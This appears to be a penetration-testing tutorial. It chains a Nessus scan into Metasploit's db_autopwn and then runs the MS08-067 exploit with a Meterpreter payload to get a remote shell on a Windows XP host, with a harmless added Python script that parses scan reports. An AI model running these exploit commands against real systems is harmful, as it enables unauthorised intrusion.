Today I'm going to show you how to use Nessus to create a vulnerability report that Metasploit can use to tell us what our target is vulnerable to. Nessus is not included in BackTrack 4, so you either have to get it from the Nessus website or install it with apt-get. The command for apt-get is:
apt-get install nessus nessusd
Now that you have Nessus installed, run "nessusd" in a terminal window. nessusd is the server side of Nessus and it holds all of the plugins. It will take quite a while to load, but once it's done, launch the client side of Nessus (found in the menu, or run "nessus" in a terminal).
NOTE: You may have to add a user. Use "nessus-adduser" for this.
Now that you have Nessus running, go to the "Nessusd host" tab and put in the username and password, then hit "Log in." This should connect the Nessus client to your nessusd server (connecting may take a while). Now go over to the "Target" tab and put in the IP address of your target. Click "Start the scan." After a while, another window will pop up with your results. Save them into a file for later (e.g. /root/nessus.nbe).
Now open a terminal window and go to your Metasploit Framework directory (mine is /pentest/exploits/framework3). Now run ./msfconsole. This will give you the Metasploit prompt, and now you can create a database to load the Nessus NBE file into.
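Before importing the saved report anywhere, it helps to see what a file like /root/nessus.nbe actually holds. The following is an added example, not part of the original post: a small Python parser that summarizes NBE findings per host, most severe first. The pipe-delimited row layout in the comments is an assumption about the NBE format, and the sample rows, plugin IDs and finding text are constructed placeholders.

```python
# Assumed NBE row layout (pipe-delimited):
#   results|subnet|host|port|plugin_id|severity|description
# Rows with only four fields just record an open port and are skipped.
from collections import defaultdict

SEVERITY_RANK = {"Security Hole": 0, "Security Warning": 1, "Security Note": 2}

# Constructed sample data; plugin IDs and finding text are placeholders.
SAMPLE_NBE = """\
timestamps|||scan_start|Mon Jan  4 10:00:00 2010|
results|192.168.1|192.168.1.113|microsoft-ds (445/tcp)
results|192.168.1|192.168.1.113|microsoft-ds (445/tcp)|10001|Security Hole|Missing patch (placeholder)\\nSolution: apply vendor update
results|192.168.1|192.168.1.113|netbios-ssn (139/tcp)|10002|Security Note|Service banner (placeholder)
results|192.168.1|192.168.1.113|general/tcp|10003|Security Warning|Weak setting | with a pipe in the text
timestamps|||scan_end|Mon Jan  4 10:20:00 2010|
"""

def parse_nbe(text):
    """Return a list of finding dicts; skip timestamps and port-only rows."""
    findings = []
    for line in text.splitlines():
        # maxsplit=6 keeps any '|' inside the description intact
        parts = line.split("|", 6)
        if parts[0] != "results" or len(parts) < 7:
            continue
        _, _, host, port, plugin_id, severity, desc = parts
        findings.append({
            "host": host, "port": port, "plugin_id": plugin_id,
            "severity": severity,
            # newlines are stored in the file as a literal backslash-n
            "description": desc.replace("\\n", "\n"),
        })
    return findings

def triage(findings):
    """Group by host, most severe first (unknown severities sort last)."""
    by_host = defaultdict(list)
    for f in findings:
        by_host[f["host"]].append(f)
    for items in by_host.values():
        items.sort(key=lambda f: (SEVERITY_RANK.get(f["severity"], 99), f["port"]))
    return dict(by_host)

if __name__ == "__main__":
    for host, items in triage(parse_nbe(SAMPLE_NBE)).items():
        print(host)
        for f in items:
            first = (f["description"].splitlines() or [""])[0]
            print(f"  [{f['severity']}] {f['port']} plugin {f['plugin_id']}: {first}")
```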
db_create /root/database.db
This will create the database in our root folder and connect to it. Now do "db_import_nessus_nbe /root/nessus.nbe" which will load in the nessus scan results.
Now do:
db_autopwn -t -x
Metasploit will check the file to see what exploits will work against the machine. Now pick one of the exploits. I'm going to be using "windows/smb/ms08_067" against a Windows XP SP2 machine.
use windows/smb/ms08_067
(change it to your exploit). Set the payload that you want. I'm going to be using Meterpreter.
set PAYLOAD windows/meterpreter/bind_tcp
Now set the IP address of your target in the RHOST variable...
set RHOST 192.168.1.113
Now you're ready to exploit!
exploit
If everything went well, you should now have a Meterpreter session!
Finding it hard to understand? Here is a video covering the same steps:
http://www.youtube.com/watch?v=8TqMDzBiM9Q
Credits to Nullbyte Security for filming the video.